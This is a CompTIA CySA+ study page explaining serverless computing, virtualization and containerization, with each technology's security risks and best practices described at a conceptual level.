Serverless, virtualization, containerization

1.1 System and Network Architecture Concepts

Infrastructure

📘CompTIA CySA+ (CS0-003)

Modern IT infrastructure uses several technologies to deliver applications efficiently, securely, and cost-effectively. Three important concepts you must understand for the CySA+ exam are:

  1. Serverless computing
  2. Virtualization
  3. Containerization

These are foundational in cloud and enterprise environments, and security analysts must understand how they work, where they are used, and what risks they introduce.

1. Serverless Computing

What Serverless Means

Serverless computing is a cloud execution model where the cloud provider runs and manages everything behind the scenes—servers, operating systems, scaling, updates, and capacity planning.
Developers only upload their code, and the cloud automatically runs it.

You do not manage:

  • Servers
  • Operating systems
  • Patching
  • Resource scaling

The cloud runs the code on-demand, usually in small units called functions.

Key Characteristics

  • No server management: The cloud provider handles all infrastructure.
  • Event-driven: Functions run only when triggered (e.g., file upload, API request).
  • Scales automatically: More traffic = more function executions.
  • Pay per execution: You pay only when your code runs.
  • Short-lived execution: Functions run for short periods, not continuously.

Common Serverless Services (IT Environment Examples)

  • Running an authentication API endpoint
  • Processing logs or security alerts
  • Automatically resizing uploaded images
  • Cleaning or transforming incoming data

Security Considerations (Important for CySA+)

Because the customer does not control the underlying systems, security responsibilities shift.

Security Responsibilities of the User:

  • Secure the application code
  • Properly configure access controls (IAM permissions)
  • Validate input to prevent injection attacks
  • Protect API endpoints

Security Responsibilities of the Cloud Provider:

  • Server patching
  • Operating system hardening
  • Infrastructure monitoring
  • Physical security

Serverless Security Risks

  • Misconfigured permissions (excessive privileges for functions)
  • Insecure APIs
  • Event-data injection attacks
  • Lack of visibility into infrastructure logs
  • Dependency vulnerabilities in the function code

2. Virtualization

What Virtualization Is

Virtualization allows multiple virtual machines (VMs) to run on a single physical server.
A hypervisor manages these VMs.

Each VM has:

  • its own operating system
  • its own virtual CPU
  • virtual memory
  • virtual storage
  • virtual network interfaces

Types of Virtualization

  1. Server Virtualization
    • Runs multiple VMs on one server for better resource use.
  2. Network Virtualization
    • Virtual switches, routers, and firewalls.
  3. Storage Virtualization
    • Combines physical disks into a shared storage pool.
  4. Desktop Virtualization (VDI)
    • Users access virtual desktops over a network.

Hypervisor Types

Type 1: Bare-metal hypervisors

  • Installed directly on physical hardware.
  • Used in data centers (e.g., VMware ESXi, Microsoft Hyper-V, KVM).
  • More secure and efficient.

Type 2: Hosted hypervisors

  • Installed inside an OS (e.g., VirtualBox, VMware Workstation).
  • Used for testing or learning.

Security Benefits of Virtualization

  • Isolation between VMs
  • Snapshots allow easy rollback after malware infection
  • Virtual firewalls and intrusion prevention
  • Segmentation between applications and environments

Security Risks

  • Hypervisor attacks: If the hypervisor is exploited, all VMs may be compromised.
  • VM escape: Malware breaks out of a VM into the hypervisor.
  • Misconfigured virtual networks: May allow unwanted traffic flow.
  • Orphaned snapshots: Older snapshots may contain vulnerabilities.
  • VM sprawl: Too many unused VMs increase attack surface.

3. Containerization

What Containerization Is

Containerization packages an application and its dependencies into a lightweight, isolated unit called a container.

Containers:

  • Share the host OS kernel
  • Have isolated processes
  • Start very quickly
  • Require fewer resources than VMs

A container is not a full virtual machine—it’s a compact application environment.

Common Container Platforms

  • Docker
  • CRI-O
  • containerd
  • Kubernetes (orchestrates multiple containers)

Differences Between Containers and VMs

FeatureVirtual Machines (VMs)Containers
OSEach VM has its own full OSShare the host OS kernel
SizeLarge (GBs)Very small (MBs)
Startup timeSlow (minutes)Fast (seconds)
IsolationStrong (via hypervisor)Moderate (via namespaces/cgroups)
Use caseLarge workloads, full OSMicroservices, scalable apps

Container Components

  • Images: Templates used to create containers.
  • Container runtime: Engine that runs containers (e.g., Docker Engine).
  • Registry: Stores container images (e.g., Docker Hub).

Where Containers Are Used in IT

  • Running microservices
  • Hosting APIs
  • Deploying applications across different environments
  • Automating CI/CD pipelines

Security Considerations

Because containers share the same OS kernel, attackers may exploit kernel vulnerabilities to move between containers.

Common Security Risks

  • Insecure container images
  • Misconfigured container permissions
  • Overly privileged containers (running as root)
  • Vulnerable container runtimes
  • Exposed administrative dashboards (e.g., Kubernetes)

Best Security Practices

  • Use trusted images
  • Scan container images for vulnerabilities
  • Apply least privilege
  • Limit container-to-container communication
  • Use Kubernetes network policies
  • Keep the host OS patched

Comparison Summary

Serverless vs. Virtualization vs. Containerization

FeatureServerlessVirtualizationContainerization
Infrastructure managementNone by userUser manages VMsUser manages containers
Runs onCloud-managed platformHypervisorContainer engine
ExecutionFunctions on-demandFull OS instancesLightweight processes
Security focusPermissions, code securityHypervisor/VM isolationImage/runtimes, kernel security
ScalingAutomaticManual or semi-automaticAutomatic with orchestration tools

What CySA+ Wants You to Understand

For the exam, you must clearly know:

Serverless

  • How it works
  • Why it is used
  • Security responsibilities and risks
  • Event-driven architecture

Virtualization

  • Hypervisor types
  • VM isolation and risks (VM escape, misconfiguration)
  • Resource sharing
  • Threats related to snapshots and sprawl

Containerization

  • Containers vs. VMs
  • Images, registries, runtimes
  • Security best practices
  • Kubernetes risks and network controls

Conclusion

Serverless, virtualization, and containerization are fundamental technologies in modern IT infrastructures.
Cybersecurity analysts must understand how they work, their architecture, and the security implications associated with each. On the CySA+ exam, expect questions focused on:

  • Differences between each technology
  • Shared responsibility models
  • Security risks, misconfigurations, and isolation issues
  • How these technologies support modern cloud and enterprise environments
Buy Me a Coffee

Powered by
Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None
Powered by